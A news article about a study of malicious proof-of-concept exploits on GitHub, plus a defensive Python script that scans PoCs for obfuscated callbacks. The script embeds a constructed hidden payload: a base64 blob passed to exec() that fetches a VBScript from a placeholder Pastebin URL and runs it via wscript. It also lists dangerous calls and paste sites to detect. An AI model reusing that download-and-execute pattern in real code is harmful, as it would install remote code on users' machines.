Thousands of GitHub repos offer malicious PoCs


Thousands of repositories on GitHub distribute fake proof-of-concept (PoC) exploits laced with malware, according to an extensive study conducted by researchers at the Leiden Institute of Advanced Computer Science in the Netherlands.

The team examined 47,313 GitHub repositories containing PoC code for known vulnerabilities disclosed between 2017 and 2021 and found that 4,893 of them were malicious, most of them concerning vulnerabilities from 2020. To decide whether a repository was trustworthy, the researchers looked for traits such as trojanized binaries, obfuscated rogue code, and callbacks to known-malicious IP addresses.

“Professional frameworks like Metasploit or reputable databases like Exploit-DB contain exploits for many CVEs, but not for all of them. Pentesters then turn to Proof of Concept (PoC) exploits published in public code repositories like GitHub to see if they can find something they can use to exploit the issue and demonstrate the vulnerability. Usually sources like Exploit-DB try to validate the effectiveness and legitimacy of PoCs. In contrast, public code platforms like GitHub do not have the exploit vetting process,” the researchers wrote in the technical paper.

Among the most dangerous examples the research team discovered were exploits laced with Cobalt Strike backdoors, infostealers, and remote access trojans.

“During our research we found multiple examples of malicious proof of concepts made for CVEs. These PoCs have had multiple intentions: some of them contain malware, some are used to gather information about users of the PoC, and others are made to simply mock people and remind them that running proof of concepts without reading the code can be harmful,” the researchers said.

One interesting case concerns a repository that offered a PoC for CVE-2019-0708, aka BlueKeep, which contained a base64-obfuscated Python script that fetched a VBScript from Pastebin. That script was the Houdini RAT (Hworm/njRAT), an old VBScript-based trojan that first appeared in 2013 in targeted attacks against the international energy industry, primarily in the Middle East.
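The traits the study used (trojanized binaries, obfuscated code, callbacks to external addresses) and the BlueKeep case above suggest a first-pass triage a pentester can run before executing a downloaded PoC: peel back base64 layers and look for network fetches, paste-site URLs, public IP addresses and execution primitives that only appear in the decoded layers. The script below is an added example written for this page; it is not code from the Leiden study or from any repository it analysed. The sample PoC it scans is constructed to mimic the described shape (a base64 blob passed to exec() that downloads a .vbs from a paste site) and is not the actual malicious repository contents; the keyword lists, the 40-character blob threshold and the verdict rules are assumptions.

```python
import base64
import ipaddress
import re
from dataclasses import dataclass

# --- constructed sample input (not the real repository code) -----------------
# A benign-looking "checker" whose real behaviour is hidden in a base64 blob.
HIDDEN = (
    'import urllib.request, subprocess\n'
    's = urllib.request.urlopen("https://pastebin.com/raw/EXAMPLE").read()\n'
    'open("update.vbs", "wb").write(s)\n'
    'subprocess.call(["wscript", "update.vbs"])\n'
)
_BLOB = base64.b64encode(HIDDEN.encode()).decode()
SAMPLE_POC = (
    "import base64, sys\n"
    'print("[*] CVE-2019-0708 (BlueKeep) checker")\n'
    'exec(base64.b64decode("' + _BLOB + '"))\n'
)

# --- detection logic (assumed thresholds and keyword lists) ------------------
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")        # long base64-looking runs
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")      # note: also hits x.y.z.w version strings
DANGEROUS = ("exec(", "eval(", "subprocess", "os.system", "wscript",
             "powershell", "base64.b64decode", "urlopen", "requests.get")
PASTE_HOSTS = ("pastebin.com", "paste.ee", "hastebin", "ghostbin")


@dataclass
class Finding:
    kind: str
    detail: str
    layer: int  # 0 = visible source; n = found after n base64 decodes


def decode_blobs(text):
    """Yield the decoded text of every long base64 run that is mostly printable."""
    for m in B64_RE.finditer(text):
        raw = m.group(0)
        try:
            data = base64.b64decode(raw + "=" * (-len(raw) % 4), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        decoded = data.decode("utf-8", errors="replace")
        printable = sum(c.isprintable() or c.isspace() for c in decoded)
        if decoded and printable / len(decoded) > 0.9:
            yield decoded


def scan_text(text, layer=0, max_depth=3):
    """Collect indicators from `text`, recursing into base64 layers up to max_depth."""
    findings = []
    for kw in DANGEROUS:
        if kw in text:
            findings.append(Finding("dangerous-call", kw, layer))
    for url in URL_RE.findall(text):
        host = url.split("/")[2].lower()
        kind = "paste-site-url" if any(h in host for h in PASTE_HOSTS) else "url"
        findings.append(Finding(kind, url, layer))
    for ip in IPV4_RE.findall(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue
        if addr.is_global:  # loopback / RFC1918 lab targets are expected in a PoC
            findings.append(Finding("public-ip", ip, layer))
    if layer < max_depth:
        for decoded in decode_blobs(text):
            findings.append(Finding("base64-blob", f"{len(decoded)} decoded chars", layer))
            findings.extend(scan_text(decoded, layer + 1, max_depth))
    return findings


def triage(text):
    """Return (verdict, findings). Visible subprocess/socket use is normal for an
    exploit, so only behaviour hidden inside decoded layers, or a paste-site
    fetch anywhere, escalates the verdict."""
    findings = scan_text(text)
    hidden = [f for f in findings
              if f.layer > 0 and f.kind in ("dangerous-call", "url", "paste-site-url", "public-ip")]
    paste = [f for f in findings if f.kind == "paste-site-url"]
    if hidden or paste:
        return "suspicious", findings
    return ("review-manually" if findings else "no-indicators"), findings


if __name__ == "__main__":
    verdict, findings = triage(SAMPLE_POC)
    print("verdict:", verdict)
    for f in findings:
        print(f"  layer {f.layer}: {f.kind:15} {f.detail}")
```

This is triage, not a verdict: a PoC that trips nothing here can still carry a trojanized binary or a second-stage download that only happens at runtime, and binaries need a separate check (hash lookups, confirming that every compiled artifact has matching source in the repo). The useful habit the script encodes is to decode every blob and read the result before running anything.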

“Inside some of these malicious PoCs we found instructions to open backdoors or plant malware in the system that is running them. This means that these PoCs are indeed targeting the security service community, which leads to targeting every customer of such a security company using these PoCs from GitHub,” the research team warned.
